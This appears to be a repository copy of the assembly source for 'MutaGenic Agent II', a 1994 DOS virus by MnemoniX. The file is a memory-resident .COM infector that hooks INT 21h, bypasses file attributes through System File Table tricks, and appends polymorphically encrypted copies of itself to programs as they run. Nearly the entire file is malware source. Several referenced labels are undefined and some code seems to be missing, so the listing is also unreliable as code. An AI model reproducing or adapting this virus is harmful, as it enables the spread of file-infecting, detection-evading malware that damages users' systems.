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synced 2025-02-22 22:53:41 +00:00
207 lines
7.1 KiB
207 lines
7.1 KiB
; ========================================================================>
; MutaGenic Agent ][ - MutaGen V1.3 Test Virus
; by MnemoniX 1994
; A simple resident .COM infector implementing MutaGen.
; To assemble:
; TASM mg2
; TLINK /t mg2 mutagen
; ========================================================================>
ID equ 'MG'
PING equ 0BADh ; a seldom used DOS function
PONG equ 0DEADh ; residency response
MUTAGEN_SIZE equ 1652 ; version 1.3
extrn _MUTAGEN:near
code segment byte public 'code'
org 100h
assume cs:code,ds:code,es:code,ss:code
jmp virus_begin ; fake host program
dw ID ; infection signature
call $ + 3
pop bp
sub bp,offset $ - 1
mov ax,PING ; are we already resident?
int 21h
cmp dx,PONG
je installed ; if so, don't repeat ...
mov ax,ds ; blah, blah, blah
dec ax
mov ds,ax
sub word ptr ds:[3],(MEM_SIZE + 15) / 16 + 1
sub word ptr ds:[12h],(MEM_SIZE + 15) / 16 + 1
mov ax,ds:[12h]
mov ds,ax
sub ax,15
mov es,ax
mov byte ptr ds:[0],'Z'
mov word ptr ds:[1],8
mov word ptr ds:[3],(MEM_SIZE + 15) / 16
push cs ; now move virus into memory
pop ds
mov di,100h
mov cx,(offset virus_end - offset start) / 2
lea si,[bp + start]
rep movsw
xor ax,ax ; move interrupt vector 21
mov ds,ax
mov si,21h * 4 ; (saving it first)
mov di,offset old_int_21
mov ds:[si - 4],offset new_int_21
mov ds:[si - 2],es
push cs
push cs
pop ds
pop es
mov di,100h ; restore original host
push di
lea si,[bp + host]
xor ax,ax ; fix a few registers
mov si,100h
ret ; and leave
cmp ax,PING ; residency test?
je pass_signal ; yah yah!
cmp ax,4B00h ; program execute?
je execute ; oui oui ...
db 0EAh ; nope, never mind
old_int_21 dd 0
mov dx,PONG ; give passing signal
jmp int_21_exit
push ax bx cx dx di si es ds ; a PUSHA is nicer, but it
; won't work on an 8088
mov ax,3D00h ; open file
int 21h
jnc get_sft
jmp cant_open ; ecch ...
xchg ax,bx ; this virus implements the
push bx ; use of System File Table
mov ax,1220h ; (TM) manipulation
int 2Fh
mov ax,1216h
mov bl,es:[di]
int 2Fh
pop bx
push cs
pop ds
mov cx,5 ; read header of file
mov dx,offset host
mov ah,3Fh
int 21h
cmp word ptr host,'ZM' ; .EXE file?
je dont_infect ; oh well ...
cmp word ptr host[3],ID ; already infected?
je dont_infect ; maybe next time ...
mov word ptr es:[di + 2],2 ; a slick way of sidestepping
; file attributes
mov ax,es:[di + 11h] ; get file size
cmp ax,65729 - VIRUS_SIZE + 100
jae dont_infect ; don't infect, too large
mov es:[di + 15h],ax ; move to end of file
sub ax,3 ; adjust for jump
mov word ptr new_jump[1],ax
; MutaGen calling routine
push es di
push cs ; setup registers
pop es
mov di,offset virus_end
mov si,offset virus_begin
add ax,103h
mov dx,ax
call _mutagen ; "It's a POLYMORPHIC WAR
; OUT THERE!" - P. Ferguson
pop di es ; restore DI and ES
mov ah,40h ; save virus code to file
int 21h
mov word ptr es:[di + 15h],0 ; reset file pointer
mov ah,40h ; and write new jump to file
mov dx,offset new_jump
mov cx,5
int 21h
mov cx,es:[di + 0Dh] ; restore file time
mov dx,es:[di + 0Fh]
mov ax,5701h
int 21h
mov ah,3Eh ; close up shop
int 21h
pop ds es si di dx cx bx ax
jmp int_21_exit
db '[MutaGenic Agent II]',0
host: ; original host header
mov ax,4C00h
int 21h
new_jump db 0E9h ; new jump instruction
dw 0
dw ID
virus_end equ $ + MUTAGEN_SIZE + 1 ; add MutaGen size to virus
; size
VIRUS_SIZE equ virus_end - virus_begin
MEM_SIZE equ VIRUS_SIZE * 2 + 100 ; extra memory for encryption
; buffer
code ends
end start